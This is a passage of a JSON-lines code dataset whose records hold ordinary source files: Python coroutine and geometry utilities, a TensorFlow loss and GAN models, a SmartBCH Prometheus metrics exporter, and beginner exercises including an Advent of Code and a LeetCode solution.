+{"seq_id":"7453967577","text":"from greenlet import greenlet\n# 执行test1,执行test2,跳回来,继续\n# 执行test没执行完的内容,再执行test2没执行完的内容\ndef test1():\n print(\"执行test1\")\n gr2.switch()\n print(\"结束test1\")\n gr2.switch()\n\ndef test2():\n print(\"执行test2\")\n gr1.switch()\n print(\"结束test2\")\n\n# 将函数变为协程\ngr1 = greenlet(test1)\ngr2 = greenlet(test2)\n\n# 执行协程1\ngr1.switch()","repo_name":"suprviserpy632157/zdy","sub_path":"ZDY/Feb_all/python多任务编程/February0209/afternoon/greenlet_0.py","file_name":"greenlet_0.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"75022902618","text":"import logging\nfrom typing import List, Tuple\n\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\n\ndef compute_polygon_bboxes(polygons: np.ndarray) -> np.ndarray:\n \"\"\"Compute the minimum size enclosing xy bounding box for each polygon that is provided as input.\n Args:\n polygons: an array of type 'O' (object) with shape (n,). Each object has shape (m, 3+).\n\n Returns:\n polygon_bboxes: a float array with shape (n, 4).\n \"\"\"\n bboxes: List[np.ndarray] = []\n\n for polygon in polygons:\n bbox = compute_point_cloud_bbox(polygon)\n bboxes.append(bbox)\n\n polygon_bboxes = np.array(bboxes)\n return polygon_bboxes\n\n\ndef compute_point_cloud_bbox(point_cloud: np.ndarray, verbose: bool = False) -> np.ndarray:\n \"\"\"Given a set of 2D or 3D points, find the minimum size axis-aligned bounding box in the xy plane (ground plane).\n\n Args:\n point_cloud: an array of dim (N,3) or (N,2).\n verbose: False by default, if set to True, it prints the bounding box dimensions.\n\n Returns:\n bbox: an array of dim (4,) representing x_min, y_min, x_max, y_max.\n \"\"\"\n x_min = np.amin(point_cloud[:, 0])\n x_max = np.amax(point_cloud[:, 0])\n\n y_min = np.amin(point_cloud[:, 1])\n y_max = np.amax(point_cloud[:, 1])\n\n bbox_width = x_max - x_min\n bbox_height = y_max - y_min\n\n bbox = np.array([x_min, y_min, x_max, y_max])\n\n if verbose:\n logger.info(f\"Point cloud bbox width = {bbox_width}, height = {bbox_height}\")\n return bbox\n\n\ndef find_all_polygon_bboxes_overlapping_query_bbox(polygon_bboxes: np.ndarray, query_bbox: np.ndarray) -> np.ndarray:\n \"\"\"Find all the overlapping polygon bounding boxes.\n\n Each bounding box has the following structure:\n bbox = np.array([x_min,y_min,x_max,y_max])\n\n In 3D space, if the coordinates are equal (polygon bboxes touch), then these are considered overlapping.\n We have a guarantee that the cropped image will have any sort of overlap with the zero'th object bounding box\n inside of the image e.g. 
along the x-dimension, either the left or right side of the bounding box lies between the\n edges of the query bounding box, or the bounding box completely engulfs the query bounding box.\n\n Args:\n polygon_bboxes: An array of shape (K,), each array element is a NumPy array of shape (4,) representing\n the bounding box for a polygon or point cloud.\n query_bbox: An array of shape (4,) representing a 2d axis-aligned bounding box, with order\n [min_x,min_y,max_x,max_y].\n\n Returns:\n An integer array of shape (K,) representing indices where overlap occurs.\n \"\"\"\n query_min_x = query_bbox[0]\n query_min_y = query_bbox[1]\n\n query_max_x = query_bbox[2]\n query_max_y = query_bbox[3]\n\n bboxes_x1 = polygon_bboxes[:, 0]\n bboxes_x2 = polygon_bboxes[:, 2]\n\n bboxes_y1 = polygon_bboxes[:, 1]\n bboxes_y2 = polygon_bboxes[:, 3]\n\n # check if falls within range\n overlaps_left = (query_min_x <= bboxes_x2) & (bboxes_x2 <= query_max_x)\n overlaps_right = (query_min_x <= bboxes_x1) & (bboxes_x1 <= query_max_x)\n\n x_check1 = bboxes_x1 <= query_min_x\n x_check2 = query_min_x <= query_max_x\n x_check3 = query_max_x <= bboxes_x2\n x_subsumed = x_check1 & x_check2 & x_check3\n\n x_in_range = overlaps_left | overlaps_right | x_subsumed\n\n overlaps_below = (query_min_y <= bboxes_y2) & (bboxes_y2 <= query_max_y)\n overlaps_above = (query_min_y <= bboxes_y1) & (bboxes_y1 <= query_max_y)\n\n y_check1 = bboxes_y1 <= query_min_y\n y_check2 = query_min_y <= query_max_y\n y_check3 = query_max_y <= bboxes_y2\n y_subsumed = y_check1 & y_check2 & y_check3\n y_in_range = overlaps_below | overlaps_above | y_subsumed\n\n overlap_indxs = np.where(x_in_range & y_in_range)[0]\n return overlap_indxs\n\n\ndef find_local_polygons(\n lane_polygons: np.ndarray,\n lane_bboxes: np.ndarray,\n query_min_x: float,\n query_max_x: float,\n query_min_y: float,\n query_max_y: float,\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Find local polygons. 
The overlapping array indices are always returned as well.\n\n Takes a collection of precomputed polygon bounding boxes, compares them with a query bounding box, and returns the\n polygons that overlap, along with their array indices.\n\n Args:\n lane_polygons: An array of polygons.\n lane_bboxes: An array of shape (K,), each array element is a NumPy array of shape (4,) representing\n the bounding box for a polygon or point cloud.\n query_min_x: minimum x coordinate of the query bounding box.\n query_max_x: maximum x coordinate of the query bounding box.\n query_min_y: minimum y coordinate of the query bounding box.\n query_max_y: maximum y coordinate of the query bounding box.\n\n Returns:\n Overlapping polygons.\n Overlapping indices.\n \"\"\"\n query_bbox = np.array([query_min_x, query_min_y, query_max_x, query_max_y])\n overlap_indxs = find_all_polygon_bboxes_overlapping_query_bbox(lane_bboxes, query_bbox)\n\n pruned_lane_polygons = lane_polygons[overlap_indxs]\n return pruned_lane_polygons, overlap_indxs\n\n\ndef prune_polygons_manhattan_dist(\n query_pt: np.ndarray,\n points_xyz: np.ndarray,\n query_search_range_manhattan: float = 200.0,\n) -> np.ndarray:\n \"\"\"Prune polygon points based on a search area defined by the manhattan distance.\n\n Take a collection of small point clouds and return only point clouds that fall within a manhattan search radius of\n the 2D query point.\n\n Similar to the function above, except query bounding box and polygon bounding boxes are not pre-computed, meaning\n they must be computed on the fly, which can be quite computationally expensive in a loop.\n\n Args:\n query_pt: Numpy n-d array with dimension (2,) representing xy query location.\n points_xyz: An array of shape (n,) of array objects. Each array object could be a 2D or 3D polygon, i.e. of\n shape (m,2) or (m,3) respectively.\n query_search_range_manhattan: Half the side length of the query bounding box square, set to 200 by default.\n\n Returns:\n An array of pruned xyz point objects of shape (k,). Each array object could be a 2D or 3D polygon, i.e. of shape\n (m,2) or (m,3) respectively.\n \"\"\"\n bboxes = compute_polygon_bboxes(points_xyz)\n\n query_min_x = query_pt[0] - query_search_range_manhattan\n query_max_x = query_pt[0] + query_search_range_manhattan\n query_min_y = query_pt[1] - query_search_range_manhattan\n query_max_y = query_pt[1] + query_search_range_manhattan\n\n query_bbox = np.array([query_min_x, query_min_y, query_max_x, query_max_y])\n overlap_indxs = find_all_polygon_bboxes_overlapping_query_bbox(bboxes, query_bbox)\n\n pruned_points_xyz = points_xyz[overlap_indxs]\n return pruned_points_xyz\n","repo_name":"argoverse/argoverse-api","sub_path":"argoverse/utils/manhattan_search.py","file_name":"manhattan_search.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":760,"dataset":"github-code","pt":"69"}
+{"seq_id":"31466061585","text":"\"\"\"\nTensorflow implementation of the Cross entropy loss with label smoothing.\n\nOriginal paper:\nSzegedy et al. Rethinking the Inception Architecture for Computer Vision. CVPR 2016.\n\nModified from torch implementation:\nhttps://github.com/mikwieczorek/centroids-reid/blob/main/losses/triplet_loss.py\n\"\"\"\n\nimport tensorflow as tf\nfrom typing import Any, Callable\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.losses import CategoricalCrossentropy\nfrom tensorflow_similarity.types import IntTensor, FloatTensor\n\n\nXENT_DENSE_INITIALIZER = {\n\t'class_name': 'RandomNormal',\n\t'config': {\n\t\t'mean': 0.0,\n\t\t'stddev': 0.001\n\t}\n}\n\n\nclass CrossEntropyLabelSmooth(tf.keras.losses.Loss):\n\t\"\"\"\n\tCross entropy loss with label smoothing regularizer.\n\n\tEquation: y = (1 - epsilon) * y + epsilon / K.\n\n\tArgs:\n\t\tnum_classes (int): number of classes.\n\t\tepsilon (float): weight.\n\n\t\"\"\"\n\n\tdef __init__(\n\t\t\tself,\n\t\t\tnum_classes: int,\n\t\t\tepsilon: float = 0.1,\n\t\t\treduction: Callable = tf.keras.losses.Reduction.AUTO,\n\t\t\tname: str = 'xent_label_smooth',\n\t\t\t**kwargs\n\t) -> None:\n\n\t\tsuper().__init__(reduction=reduction, name=name, **kwargs)\n\n\t\tself.epsilon = epsilon\n\t\tself.num_classes = num_classes\n\n\t\tself.fully_connected_layer = layers.Dense(\n\t\t\tunits=num_classes,\n\t\t\tactivation=None,\n\t\t\tuse_bias=False,\n\t\t\tkernel_initializer=XENT_DENSE_INITIALIZER,\n\t\t\tdtype='float32'\n\t\t)\n\n\t\tself.cross_entropy = CategoricalCrossentropy(\n\t\t\tlabel_smoothing=epsilon,\n\t\t\treduction=reduction,\n\t\t\tfrom_logits=True\n\t\t)\n\n\t\tself.fill_value = 1\n\n\tdef call(\n\t\t\tself,\n\t\t\tlabels: IntTensor,\n\t\t\tembeddings: FloatTensor\n\t) -> Any:\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tlabels: ground truth labels with shape (batch_size)\n\t\t\tembeddings: embeddings with shape (batch_size, embedding_size)\n\t\t\"\"\"\n\n\t\tcls_score = self.fully_connected_layer(embeddings)\n\t\tlog_probs = tf.nn.log_softmax(logits=cls_score, axis=1)\n\n\t\t_, labels_idx = tf.unique(labels)\n\t\tdepth = log_probs.shape[-1]\n\t\tbinary_labels = tf.one_hot(\n\t\t\tindices=labels_idx,\n\t\t\tdepth=depth,\n\t\t\ton_value=self.fill_value,\n\t\t\tdtype=tf.float32\n\t\t)\n\n\t\tloss = self.cross_entropy(\n\t\t\ty_true=binary_labels,\n\t\t\ty_pred=tf.cast(log_probs, dtype=tf.float32)\n\t\t)\n\n\t\treturn loss\n","repo_name":"RevisorTeam/evolly","sub_path":"examples/tf_examples/image_retrieval/losses/xent_label_smooth.py","file_name":"xent_label_smooth.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"32214395378","text":"import sys\nimport re\nfrom collections import namedtuple, defaultdict\n\nClaim = namedtuple('Claim', 'id left top width height')\n\n\ndef claim_points(claim):\n for y in range(0, claim.height):\n for x in range(0, claim.width):\n yield x, y\n\n\ndef step1(claims):\n d = defaultdict(lambda: defaultdict(int))\n r = 0\n for claim in claims:\n for x, y in claim_points(claim):\n c = d[claim.top + y][claim.left + x]\n d[claim.top + y][claim.left + x] += 1\n if c == 1:\n r += 1\n return r\n\n\ndef step2(claims):\n d = defaultdict(lambda: defaultdict(set))\n for claim in claims:\n for x, y in claim_points(claim):\n d[claim.top + y][claim.left + x] |= {claim.id}\n for claim in claims:\n poss = True\n for x, y in claim_points(claim):\n if d[claim.top + y][claim.left + x] != {claim.id}:\n poss = False\n break\n if poss:\n return claim.id\n raise ValueError('No solution found')\n\n\ndef read_claims():\n claims = []\n for line in sys.stdin:\n claim_id, left, right, width, height = re.match(\n r'#(\\d+) @ (\\d+),(\\d+): (\\d+)x(\\d+)',\n line\n ).groups()\n claims += [Claim(int(claim_id), int(left),\n int(right), int(width), int(height))]\n return claims\n\n\nclaims = read_claims()\nprint(step1(claims))\nprint(step2(claims))\n\n","repo_name":"plilja/adventofcode","sub_path":"2018/day03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3854677694","text":"#!/usr/bin/env python3\n# smartbchd-monitor.py\n#\n# An exporter for Prometheus and SmartBCH.\n#\n\nimport json\nimport logging\nimport time\nimport os\nimport signal\nimport sys\nimport socket\n\nfrom datetime import datetime\nfrom functools import lru_cache\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Union\nfrom wsgiref.simple_server import make_server\n\nimport riprova\n\nfrom bitcoin.rpc import JSONRPCError, InWarmupError, Proxy\nfrom prometheus_client import make_wsgi_app, Gauge, Counter\n\n\nlogger = logging.getLogger(\"smartbch-exporter\")\n\n\n# Create Prometheus metrics to track smartbchd stats.\nSMARTBCH_BLOCK = Gauge(\"smartbch_block\", \"Block Height\")\nSMARTBCH_BLOCK_TRANSACTIONS = Gauge(\"smartbch_block_transactions\", \"Transaction in block\")\nSMARTBCH_BLOCK_VALUES = Gauge(\"smartbch_block_value\", \"Total BCH in block\")\nSMARTBCH_BLOCK_GAS_USED = Gauge(\"smartbch_block_gas_used\", \"Gas used in block\")\nSMARTBCH_BLOCK_GAS_LIMIT = Gauge(\"smartbch_block_gas_limit\", \"Gas limit in block\")\nSMARTBCH_BLOCK_NONCE = Gauge(\"smartbch_block_nonce\", \"Block nonce\")\nSMARTBCH_BLOCK_DIFFICULTY = Gauge(\"smartbch_block_difficulty\", \"Block difficulty\")\nSMARTBCH_BLOCK_UNCLES = Gauge(\"smartbch_block_uncles\", \"Block uncles\")\nSMARTBCH_BLOCK_SIZE_BYTES = Gauge(\"smartbch_block_size_bytes\", \"Block size in bytes\")\nSMARTBCH_BLOCK_TIMESTAMP = Gauge(\"smartbch_block_timestamp\", \"Block timestamp\")\n\n\nSMARTBCH_BLOCK_CONTRACTS_CREATED = Gauge(\"smartbch_block_contracts_created\", \"Contracts created in block\")\nSMARTBCH_BLOCK_CONTRACT_ACTIONS = Gauge(\"smartbch_block_contract_actions\", \"Contract actions in block\")\nSMARTBCH_BLOCK_TOKEN_TRANSFERS = Gauge(\"smartbch_block_token_transfers\", \"Token transfers in block\")\nSMARTBCH_BLOCK_BCH_TRANSFERS = Gauge(\"smartbch_block_bch_transfers\", \"BCH transfers in block\")\nSMARTBCH_BLOCK_LOCKED_BCH = Gauge(\"smartbch_block_locked_bch\", \"Locked BCH in block\")\n\nSMARTBCH_GAS_PRICE = Gauge(\"smartbch_gas_price\", \"Gas price\")\nSMARTBCH_PROTOCOL_VERSION = Gauge(\"smartbch_protocol_version\", \"Protocol version\")\nSMARTBCH_CHAIN_ID = Gauge(\"smartbch_chain_id\", \"Chain id\")\n\nSMARTBCH_TOTAL_CONTRACTS_CREATED = Gauge(\"smartbch_total_contracts_created\", \"Contracts created in total\")\nSMARTBCH_TOTAL_CONTRACT_ACTIONS = Gauge(\"smartbch_total_contract_actions\", \"Contract actions in total\")\nSMARTBCH_TOTAL_TOKEN_TRANSFERS = Gauge(\"smartbch_total_token_transfers\", \"Token transfers in total\")\nSMARTBCH_TOTAL_BCH_TRANSFERS = Gauge(\"smartbch_total_bch_transfers\", \"BCH transfers in total\")\nSMARTBCH_TOTAL_LOCKED_BCH = Gauge(\"smartbch_total_locked_bch\", \"Locked BCH in total\")\nSMARTBCH_TOTAL_BLACKHOLE_BCH = Gauge(\"smartbch_total_blackhole_bch\", \"BCH Fees Burnt in total\")\n\n\nEXPORTER_ERRORS = Counter(\n \"smartbch_exporter_errors\", \"Number of errors encountered by the exporter\", labelnames=[\"type\"]\n)\nPROCESS_TIME = Counter(\n \"smartbch_exporter_process_time\", \"Time spent processing metrics from bitcoin node\"\n)\n\nSATS_PER_COIN = 1e8\nWEI_PER_COIN = SATS_PER_COIN * 1e10\n\nSMARTBCH_RPC_SCHEME = os.environ.get(\"SMARTBCH_RPC_SCHEME\", \"http\")\nSMARTBCH_RPC_HOST = os.environ.get(\"SMARTBCH_RPC_HOST\", \"localhost\")\nSMARTBCH_RPC_PORT = os.environ.get(\"SMARTBCH_RPC_PORT\", \"8332\")\nSMARTBCH_CONF_PATH = os.environ.get(\"SMARTBCH_CONF_PATH\")\nMETRICS_ADDR = os.environ.get(\"METRICS_ADDR\", \"\") # empty = any 
address\nMETRICS_PORT = int(os.environ.get(\"METRICS_PORT\", \"9332\"))\nRETRIES = int(os.environ.get(\"RETRIES\", 5))\nTIMEOUT = int(os.environ.get(\"TIMEOUT\", 30))\nRATE_LIMIT_SECONDS = int(os.environ.get(\"RATE_LIMIT\", 5))\nLOG_LEVEL = os.environ.get(\"LOG_LEVEL\", \"INFO\")\n\n\nRETRY_EXCEPTIONS = (InWarmupError, ConnectionError, socket.timeout)\n\nRpcResult = Union[Dict[str, Any], List[Any], str, int, float, bool, None]\n\n\ndef on_retry(err: Exception, next_try: float) -> None:\n err_type = type(err)\n exception_name = err_type.__module__ + \".\" + err_type.__name__\n EXPORTER_ERRORS.labels(**{\"type\": exception_name}).inc()\n logger.error(\"Retry after exception %s: %s\", exception_name, err)\n\n\ndef error_evaluator(e: Exception) -> bool:\n return isinstance(e, RETRY_EXCEPTIONS)\n\n\n@lru_cache(maxsize=1)\ndef rpc_client_factory():\n host = SMARTBCH_RPC_HOST\n if SMARTBCH_RPC_PORT:\n host = \"{}:{}\".format(host, SMARTBCH_RPC_PORT)\n service_url = \"{}://{}\".format(SMARTBCH_RPC_SCHEME, host)\n logger.info(\"Using environment configuration\")\n return lambda: Proxy(service_url=service_url, timeout=TIMEOUT)\n\n\ndef rpc_client():\n return rpc_client_factory()()\n\n\n@riprova.retry(\n timeout=TIMEOUT,\n backoff=riprova.ExponentialBackOff(),\n on_retry=on_retry,\n error_evaluator=error_evaluator,\n)\ndef smartbchrpc(*args) -> RpcResult:\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(\"RPC call: \" + \" \".join(str(a) for a in args))\n\n result = rpc_client().call(*args)\n\n logger.debug(\"Result: %s\", result)\n return result\n\nBLACKHOLE_CONTRACT_ADDRESS=\"0x0000000000000000000000626c61636b686f6c65\"\nBRIDGE_CONTRACT_ADDRESS=\"0xc172f00ac38c8b2004793f94b33483aa704045bb\"\nBRIDGE_START_BLOCK = 238790 # first block with real txs seeding with bch\n\nlastBlockStatsRead = BRIDGE_START_BLOCK-1\n\ntotalContractsCreated = 0\ntotalTokenTransfers = 0\ntotalContractActions = 0\ntotalBchTransfers = 0\ntotalBchLocked = 0\ndef refresh_metrics() -> None:\n global lastBlockStatsRead, totalContractsCreated, totalTokenTransfers, totalContractActions, totalBchTransfers, totalBchLocked\n syncing = smartbchrpc(\"eth_syncing\")\n if syncing == False:\n blockHeight = int(smartbchrpc(\"eth_blockNumber\"), base=16)\n else:\n blockHeight = int(smartbchrpc(\"eth_syncing\")['currentBlock'], base=16)\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(blockHeight)\n\n # used for initial boot to catch up on stats\n lastBlock = None\n while lastBlockStatsRead < blockHeight:\n block = smartbchrpc(\"eth_getBlockByNumber\", hex(lastBlockStatsRead), True)\n for tx in block['transactions']:\n if tx['blockNumber'] != hex(lastBlockStatsRead):\n continue\n if tx['from'] == BRIDGE_CONTRACT_ADDRESS:\n totalBchLocked += int(tx['value'], base=16)\n if tx['to'] == BRIDGE_CONTRACT_ADDRESS:\n totalBchLocked -= int(tx['value'], base=16)\n if tx['to'] == '0x0000000000000000000000000000000000000000':\n totalContractsCreated += 1\n if len(tx['input']) >= 10 and tx['input'][0:10] == '0xa9059cbb':\n totalTokenTransfers += 1\n if int(tx['value'], base=16) > 0:\n totalBchTransfers += 1\n else:\n totalContractActions += 1\n lastBlockStatsRead += 1\n lastBlock = block\n\n if lastBlock is None:\n lastBlock = smartbchrpc(\"eth_getBlockByNumber\", hex(blockHeight - 1), True)\n logger.debug(lastBlock)\n\n blackholeBchFees = int(smartbchrpc(\"eth_getBalance\", BLACKHOLE_CONTRACT_ADDRESS, hex(blockHeight - 1)), base=16)\n\n\n blockContractsCreated = 0\n blockTokenTransfers = 0\n blockContractActions = 0\n blockBchTransfers = 0\n 
blockBchLocked = 0\n for tx in lastBlock['transactions']:\n if tx['blockNumber'] != hex(blockHeight - 1):\n continue\n if tx['from'] == BRIDGE_CONTRACT_ADDRESS:\n blockBchLocked += int(tx['value'], base=16)\n if tx['to'] == BRIDGE_CONTRACT_ADDRESS:\n blockBchLocked -= int(tx['value'], base=16)\n if tx['to'] == '0x0000000000000000000000000000000000000000':\n blockContractsCreated += 1\n if len(tx['input']) >= 10 and tx['input'][0:10] == '0xa9059cbb':\n blockTokenTransfers += 1\n if int(tx['value'], base=16) > 0:\n blockBchTransfers += 1\n else:\n blockContractActions += 1\n\n\n SMARTBCH_BLOCK.set(blockHeight)\n SMARTBCH_BLOCK_TRANSACTIONS.set(len(lastBlock['transactions']))\n # SMARTBCH_BLOCK_VALUES = Gauge(\"smartbch_block_value\", \"Total BCH in block\")\n SMARTBCH_BLOCK_GAS_USED.set(int(lastBlock['gasUsed'], base=16))\n SMARTBCH_BLOCK_GAS_LIMIT.set(int(lastBlock['gasLimit'], base=16))\n SMARTBCH_BLOCK_NONCE.set(int(lastBlock['nonce'], base=16))\n SMARTBCH_BLOCK_DIFFICULTY.set(int(lastBlock['difficulty'], base=16))\n SMARTBCH_BLOCK_UNCLES.set(len(lastBlock['uncles']))\n SMARTBCH_BLOCK_SIZE_BYTES.set(int(lastBlock['size'], base=16))\n SMARTBCH_BLOCK_TIMESTAMP.set(int(lastBlock['timestamp'], base=16))\n\n\n SMARTBCH_GAS_PRICE.set(int(smartbchrpc(\"eth_gasPrice\"), base=16))\n SMARTBCH_PROTOCOL_VERSION.set(int(smartbchrpc(\"eth_protocolVersion\"), base=16))\n SMARTBCH_CHAIN_ID.set(int(smartbchrpc(\"eth_chainId\"), base=16))\n\n SMARTBCH_TOTAL_LOCKED_BCH.set(totalBchLocked / WEI_PER_COIN)\n SMARTBCH_TOTAL_CONTRACTS_CREATED.set(totalContractsCreated)\n SMARTBCH_TOTAL_CONTRACT_ACTIONS.set(totalContractActions)\n SMARTBCH_TOTAL_TOKEN_TRANSFERS.set(totalTokenTransfers)\n SMARTBCH_TOTAL_BCH_TRANSFERS.set(totalBchTransfers)\n SMARTBCH_TOTAL_BLACKHOLE_BCH.set(blackholeBchFees / WEI_PER_COIN)\n\n SMARTBCH_BLOCK_LOCKED_BCH.set(blockBchLocked / WEI_PER_COIN)\n SMARTBCH_BLOCK_CONTRACTS_CREATED.set(blockContractsCreated)\n SMARTBCH_BLOCK_CONTRACT_ACTIONS.set(blockContractActions)\n SMARTBCH_BLOCK_TOKEN_TRANSFERS.set(blockTokenTransfers)\n SMARTBCH_BLOCK_BCH_TRANSFERS.set(blockBchTransfers)\n\ndef sigterm_handler(signal, frame) -> None:\n logger.critical(\"Received SIGTERM. Exiting.\")\n sys.exit(0)\n\n\ndef exception_count(e: Exception) -> None:\n err_type = type(e)\n exception_name = err_type.__module__ + \".\" + err_type.__name__\n EXPORTER_ERRORS.labels(**{\"type\": exception_name}).inc()\n\n\ndef main():\n # Set up logging to look similar to bitcoin logs (UTC).\n logging.basicConfig(\n format=\"%(asctime)s %(levelname)s %(message)s\", datefmt=\"%Y-%m-%dT%H:%M:%SZ\"\n )\n logging.Formatter.converter = time.gmtime\n logger.setLevel(LOG_LEVEL)\n\n # Handle SIGTERM gracefully.\n signal.signal(signal.SIGTERM, sigterm_handler)\n\n app = make_wsgi_app()\n\n last_refresh = datetime.fromtimestamp(0)\n\n def refresh_app(*args, **kwargs):\n nonlocal last_refresh\n process_start = datetime.now()\n\n # Only refresh every RATE_LIMIT_SECONDS seconds.\n if (process_start - last_refresh).total_seconds() < RATE_LIMIT_SECONDS:\n return app(*args, **kwargs)\n\n # Allow riprova.MaxRetriesExceeded and unknown exceptions to crash the process.\n try:\n refresh_metrics()\n except riprova.exceptions.RetryError as e:\n logger.error(\"Refresh failed during retry. Cause: \" + str(e))\n exception_count(e)\n except JSONRPCError as e:\n logger.debug(\"SmartBCH RPC error refresh\", exc_info=True)\n exception_count(e)\n except json.decoder.JSONDecodeError as e:\n logger.error(\"RPC call did not return JSON. Bad credentials? 
\" + str(e))\n sys.exit(1)\n\n duration = datetime.now() - process_start\n PROCESS_TIME.inc(duration.total_seconds())\n logger.info(\"Refresh took %s seconds\", duration)\n last_refresh = process_start\n\n return app(*args, **kwargs)\n\n httpd = make_server(METRICS_ADDR, METRICS_PORT, refresh_app)\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blockparty-sh/smartbchd-prometheus-exporter","sub_path":"smartbchd-monitor.py","file_name":"smartbchd-monitor.py","file_ext":"py","file_size_in_byte":11303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"13883933689","text":"import tensorflow as tf\r\n\r\nclass Discriminator(tf.keras.Model):\r\n\tdef __init__(self, args, name = 'discriminator'):\r\n\t\tsuper(Discriminator, self).__init__(name = name)\r\n\t\tself.conv1 = tf.keras.layers.Conv2D(64, 7, 2, activation = tf.nn.leaky_relu)\r\n\t\tself.conv2 = tf.keras.layers.Conv2D(128, 7, 2, activation = tf.nn.leaky_relu)\r\n\t\tself.flatten = tf.keras.layers.Flatten()\r\n\t\tself.fc1 = tf.keras.layers.Dense(1)\r\n\t\tself.dis_layers = [self.conv1, self.conv2, self.flatten, self.fc1]\r\n\tdef call(self, x):\r\n\t\tfor layer in self.dis_layers:\r\n\t\t\tx = layer(x)\r\n\t\treturn x\r\n\r\nclass Generator(tf.keras.Model):\r\n\tdef __init__(self, args, name = 'generator'):\r\n\t\tsuper(Generator, self).__init__(name = name)\r\n\t\tself.fc1 = tf.keras.layers.Dense(7 * 7 * 128)\r\n\t\tself.reshape = tf.keras.layers.Reshape([7, 7, 128])\r\n\t\tself.deconv1 = tf.keras.layers.Conv2DTranspose(128, 7, 2, activation = tf.nn.leaky_relu, padding = 'same')\r\n\t\tself.deconv2 = tf.keras.layers.Conv2DTranspose(128, 7, 2, activation = tf.nn.leaky_relu, padding = 'same')\r\n\t\tself.deconv3 = tf.keras.layers.Conv2DTranspose(64, 7, 1, activation = tf.nn.leaky_relu, padding = 'same')\r\n\t\tself.deconv4 = tf.keras.layers.Conv2D(1, 3, 1, activation = tf.nn.tanh, padding = 'same')\r\n\t\t\r\n\t\tself.gen_layers = [self.fc1, self.reshape, self.deconv1, self.deconv2, self.deconv3, self.deconv4]\r\n\tdef call(self, x):\r\n\t\tfor layer in self.gen_layers:\r\n\t\t\tx = layer(x)\r\n\t\treturn x\r\n","repo_name":"WangZesen/GAN-Hinge-Loss","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"23477095146","text":"\"\"\"\"Modifique o programa para trabalhar com duas filas.\nP/ facilitar, considere atendimento: A = fila 1. B = fila 2...etc.\"\"\"\n\nultimo = 10\nultimo_dois = 5\nfila_um = list(range(1, ultimo + 1))\nfila_dois = list(range(1, ultimo_dois + 1))\nwhile True:\n fila = (input(\"Selecione qual fila irá trabalhar 1 ou 2: \"))\n if fila == '1' or fila == '2':\n if fila == '1':\n print(f\"\\nExistem {len(fila_um)} clientes na fila\")\n print(f\"Fila atual: {fila_um}\")\n elif fila == '2':\n print(F\"\\nExistem {len(fila_dois)} clientes na fila\")\n print(f\"\\nFila atual: {fila_dois}\")\n print(\"Digite:\"\n \"\\nA ou B - Realizar o atendimento\"\n \"\\nF ou G- Fim da fila\"\n \"\\nS para Sair\")\n operacao = input(\"Digite Fila 1: A, F ou S \"\n \"\\nFila 2: B, G ou S: \")\n if operacao == 'A':\n if len(fila_um) > 0:\n atendido = fila_um.pop(0)\n print(f'Cliente {atendido} atendido!')\n elif operacao == \"B\":\n if len(fila_dois) > 0:\n atendido = fila_dois.pop(0)\n print(f'Cliente {atendido} atendido!')\n else:\n print('Fila vazia!')\n elif operacao == 'F':\n ultimo += 1\n fila_um.append(ultimo)\n elif operacao == \"G\":\n ultimo_dois += 1\n fila_dois.append(ultimo_dois)\n elif operacao == 'S':\n break\n else:\n print('\\nOperação inválida ! Digte uma das opções válidas !')\n","repo_name":"ninaai517/Python_logic","sub_path":"Cap.06/Listas/Exercícios/6.6.py","file_name":"6.6.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43162310703","text":"#!/usr/bin/env python3\n#filename: LongestSubstring_6.py\n\n\"\"\"\nThis program is a solution to a leetcode.com programming problem.\n\nLeetCode problem title: 3. Longest Substring Without Repeating Characters\n\n~~~~~~~~~~~~~~~~~~~\nProblem Description\n~~~~~~~~~~~~~~~~~~~\n\nGiven a string, find the length of the longest substring without repeating characters.\n\nExample 1:\n\nInput: \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\nExample 2:\n\nInput: \"bbbbb\"\nOutput: 1\nExplanation: The answer is \"b\", with the length of 1.\nExample 3:\n\nInput: \"pwwkew\"\nOutput: 3\nExplanation: The answer is \"wke\", with the length of 3.\n Note that the answer must be a substring, \"pwke\" is a subsequence and not a substring.\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nProvided Beginning of Solution\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~\nPseudo Code for a Solution\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n~~~~~~~~~~~~~~~~~~~\nUsing This Solution\n~~~~~~~~~~~~~~~~~~~\n\nEnter this in the shell:\npython LongestSubstring_6.py\n\n\n~~~~~~~~~~~~~~~~~~\n Notes\n~~~~~~~~~~~~~~~~~~\n\n\"\"\"\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n a = \"\" # substring attempt 1\n b = \"\" # substring attempt 2\n print(f's = {s}')\n for i in range(len(s)):\n if s[i] not in a:\n a += s[i]\n print(f'a = {a.ljust(10)} b = {b}')\n else:\n print(f'a = {a.ljust(10)} b = {b}')\n if len(b) < len(a):\n b = a\n 